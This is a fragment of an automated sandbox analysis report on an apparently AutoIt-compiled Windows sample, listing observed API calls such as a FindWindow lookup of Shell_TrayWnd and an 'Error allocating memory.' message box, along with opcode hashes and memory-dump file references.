                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                  • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                  • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                  • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                    • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message_doexit
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  • API String ID: 1993061046-4017498283
                                                                                  • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                  • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                  • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                  • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D